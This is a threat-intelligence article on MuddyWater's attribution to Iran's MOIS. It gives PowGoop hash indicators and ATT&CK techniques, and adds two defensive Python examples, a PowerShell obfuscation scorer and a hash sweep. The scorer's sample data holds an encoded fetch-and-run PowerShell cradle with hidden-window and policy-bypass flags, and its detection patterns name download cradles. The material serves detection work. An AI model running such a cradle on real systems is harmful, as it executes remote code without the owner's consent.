MuddyWater Officially Tied to Iran MOIS

November 30, 2023

USCYBERCOM has officially linked MuddyWater to Iran’s Ministry of Intelligence and Security (MOIS). The first MuddyWater campaign was observed in late 2017, when it targeted entities in the Middle East.

Researchers named the campaign ‘MuddyWater’ because of the confusion in attributing a wave of attacks that, to date, has targeted entities in Saudi Arabia, Iraq, Israel, the United Arab Emirates, Georgia, India, Pakistan, Turkey, and the United States.


MOIS is the primary intelligence agency of the Islamic Republic of Iran and a member of the Iran Intelligence Community. The actors known in industry as MuddyWater are a subordinate element within MOIS, are part of the groups conducting Iranian intelligence activities, and have been seen using a variety of techniques to maintain access to victim networks.

The uploaded samples include multiple variants of the PowGoop loader, JavaScript files deployed using PowGoop, and a Mori backdoor sample.


MuddyWater has been seen using a variety of techniques to maintain access to victim networks. These include side-loading DLLs in order to trick legitimate programs into running malware and obfuscating PowerShell scripts to hide command and control functions.
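Obfuscated PowerShell is one of the two techniques named above, and it is also the one most visible in process-creation telemetry. The following is an added example, not code from the article or from any vendor report on MuddyWater: a small heuristic scorer that flags command lines carrying the usual obfuscation markers (an -EncodedCommand blob, hidden window, execution-policy bypass, backtick-split identifiers, [char] casting) and decodes the base64/UTF-16LE payload so that a download cradle hidden inside it still counts. The regexes, weights, threshold and sample command lines are all constructed assumptions, not signatures taken from a product.

```python
"""Heuristic scoring of process command lines for PowerShell obfuscation.

Added example for illustration; not code from the article or from any vendor
report. Patterns, weights and the sample command lines are constructed.
"""
import base64
import re

# (name, pattern, weight). Weights are illustrative assumptions, not tuned thresholds.
HEURISTICS = [
    ("encoded_command", re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I), 3),
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 2),
    ("bypass_policy", re.compile(r"-(?:ep|executionpolicy)\s+bypass", re.I), 2),
    ("base64_decode", re.compile(r"FromBase64String", re.I), 2),
    ("invoke_expression", re.compile(r"\b(?:iex|Invoke-Expression)\b", re.I), 2),
    ("download_cradle", re.compile(r"DownloadString|Net\.WebClient|Invoke-WebRequest", re.I), 1),
    ("char_casting", re.compile(r"\[char\]\s*\d+", re.I), 2),
]


def backtick_ratio(cmd):
    """Fraction of backtick characters; i`e`x style splitting pushes this up."""
    return cmd.count("`") / max(len(cmd), 1)


def decode_encoded_command(cmd):
    """Return the -EncodedCommand payload (base64 of UTF-16LE text), or None."""
    m = re.search(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", cmd, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_command(cmd):
    """Return (score, matched heuristic names) for one command line.

    A decoded -EncodedCommand payload is scored recursively so that a cradle
    hidden inside the base64 blob still contributes to the score.
    """
    score, hits = 0, []
    for name, pattern, weight in HEURISTICS:
        if pattern.search(cmd):
            score += weight
            hits.append(name)
    if backtick_ratio(cmd) > 0.02:
        score += 2
        hits.append("backtick_splitting")
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        inner_score, inner_hits = score_command(decoded)
        score += inner_score
        hits.extend("decoded:" + h for h in inner_hits)
    return score, hits


def is_suspicious(cmd, threshold=5):
    """Triage gate; the threshold is an assumption to tune per environment."""
    return score_command(cmd)[0] >= threshold


# Constructed samples, not real telemetry. The encoded one wraps a download
# cradle the way -EncodedCommand expects it: UTF-16LE text, base64 encoded.
INNER_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage')"
ENCODED_PAYLOAD = base64.b64encode(INNER_PAYLOAD.encode("utf-16-le")).decode("ascii")
SAMPLE_COMMANDS = {
    "benign": "powershell.exe -NoProfile Get-ChildItem C:\\Users",
    "encoded": f"powershell.exe -w hidden -ep bypass -enc {ENCODED_PAYLOAD}",
    "split": "powershell.exe i`e`x ([char]72+[char]105)",
}

if __name__ == "__main__":
    for label, cmd in SAMPLE_COMMANDS.items():
        score, hits = score_command(cmd)
        print(f"{label:8} score={score:2} suspicious={is_suspicious(cmd)} hits={hits}")
```

The split sample scores below the threshold on purpose: backtick splitting and [char] casting alone are weak signals, and a scorer like this is meant to rank command lines for review rather than to block them. The recursion into the decoded payload is the part worth keeping, since the outer command line of an encoded invocation often looks bland.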

The researchers also identified a subset of activity targeting the Exchange servers of high-profile organizations. This Exchange exploitation activity is difficult to attribute to MuddyWater because it relies on publicly available offensive security tools; the attackers attempt to exploit Exchange servers using two different tools.

Indicators of Compromise

PowGoop variants (MD5, SHA1, SHA256)

SHA1:   8FED2FF6B739C13BADB14C1A884D738C80CB6F34
SHA256: AA48F06EA8BFEBDC0CACE9EA5A2F9CE00C094CE10DF52462C4B9E87FEFE70F94

MD5:    F8E7FF6895A18CC3D05D024AC7D8BE3E
SHA1:   97248B6E445D38D48334A30A916E7D9DDA33A9B2
SHA256: F1178846036F903C28B4AB752AFE1B38B531196677400C2250AC23377CF44EC3

SHA1:   81F46998C92427032378E5DEAD48BDFC9128B225
SHA256: DD7EE54B12A55BCC67DA4CEAED6E636B7BD30D4DB6F6C594E9510E1E605ADE92

SHA1:   570F7272412FF8257ED6868D90727A459E3B179E
SHA256: B5B1E26312E0574464DDEF92C51D5F597E07DBA90617C0528EC9F494AF7E8504
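A hash list is only useful once it is run against something. The following is an added example, not code from the article or from USCYBERCOM: a sweep that hashes every file under a directory once (MD5, SHA1 and SHA256 in a single read) and reports any digest that appears in the PowGoop list above. The hash values are copied from the page; where the page gives no MD5 for a variant, none is included. The scan directory and the two sample files are constructed for the demo, and because no file can be made to hash to the listed values, the demo extends a copy of the IoC set with the SHA-256 of one constructed file to show what a hit looks like.

```python
"""Sweep a directory for files whose hashes match the PowGoop IoCs above.

Added example, not code from the article or from USCYBERCOM. Hash values are
copied from the page's IoC list; the scan tree and sample files are constructed.
"""
import hashlib
import os
import tempfile

# Copied from the article's PowGoop list, keyed by algorithm and lower-cased
# so comparisons are case-insensitive. MD5s the page does not give are absent.
POWGOOP_IOCS = {
    "md5": {h.lower() for h in (
        "F8E7FF6895A18CC3D05D024AC7D8BE3E",
    )},
    "sha1": {h.lower() for h in (
        "8FED2FF6B739C13BADB14C1A884D738C80CB6F34",
        "97248B6E445D38D48334A30A916E7D9DDA33A9B2",
        "81F46998C92427032378E5DEAD48BDFC9128B225",
        "570F7272412FF8257ED6868D90727A459E3B179E",
    )},
    "sha256": {h.lower() for h in (
        "AA48F06EA8BFEBDC0CACE9EA5A2F9CE00C094CE10DF52462C4B9E87FEFE70F94",
        "F1178846036F903C28B4AB752AFE1B38B531196677400C2250AC23377CF44EC3",
        "DD7EE54B12A55BCC67DA4CEAED6E636B7BD30D4DB6F6C594E9510E1E605ADE92",
        "B5B1E26312E0574464DDEF92C51D5F597E07DBA90617C0528EC9F494AF7E8504",
    )},
}
ALGORITHMS = ("md5", "sha1", "sha256")


def hash_bytes(data):
    """Digests of an in-memory buffer, keyed by algorithm name."""
    return {algo: hashlib.new(algo, data).hexdigest() for algo in ALGORITHMS}


def hash_file(path, chunk_size=1 << 20):
    """Compute all three digests in one pass so large files are read only once."""
    hashers = {algo: hashlib.new(algo) for algo in ALGORITHMS}
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            for h in hashers.values():
                h.update(chunk)
    return {algo: h.hexdigest() for algo, h in hashers.items()}


def scan_directory(root, iocs=POWGOOP_IOCS):
    """Return (path, algorithm, digest) for every file matching any IoC."""
    matches = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                digests = hash_file(path)
            except OSError:
                continue  # unreadable or vanished file: keep sweeping
            for algo, digest in digests.items():
                if digest in iocs.get(algo, ()):
                    matches.append((path, algo, digest))
    return matches


def demo():
    """Build a scratch tree with constructed files and run the sweep.

    Extends a copy of the IoC set with the SHA-256 of one constructed file so
    that a hit can be shown. Returns (root, stand_in_path, matches).
    """
    root = tempfile.mkdtemp(prefix="ioc_sweep_")
    os.makedirs(os.path.join(root, "sub"))
    clean = os.path.join(root, "notes.txt")
    stand_in = os.path.join(root, "sub", "sample.bin")
    with open(clean, "wb") as fh:
        fh.write(b"constructed clean file\n")
    with open(stand_in, "wb") as fh:
        fh.write(b"constructed stand-in for a known-bad file\n")
    iocs = {algo: set(values) for algo, values in POWGOOP_IOCS.items()}
    iocs["sha256"].add(hash_file(stand_in)["sha256"])
    return root, stand_in, scan_directory(root, iocs)


if __name__ == "__main__":
    root, stand_in, matches = demo()
    print("matches against the page's IoCs only:", scan_directory(root))
    for path, algo, digest in matches:
        print(f"HIT {algo} {digest} {path}")
```

Hashing in one pass matters on file servers and mail stores where a sweep touches terabytes; reading each file three times for three algorithms is the usual mistake. Matching on any of the three digests also means a variant listed only by SHA1 and SHA256 is still caught.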





MITRE ATT&CK Techniques

T1190 – Exploit Public-Facing Application
T1572 – Protocol Tunneling
T1574.001 – Hijack Execution Flow: DLL Search Order Hijacking
T1059.001 – Command and Scripting Interpreter: PowerShell
T1505.003 – Server Software Component: Web Shell
T1220 – XSL Script Processing
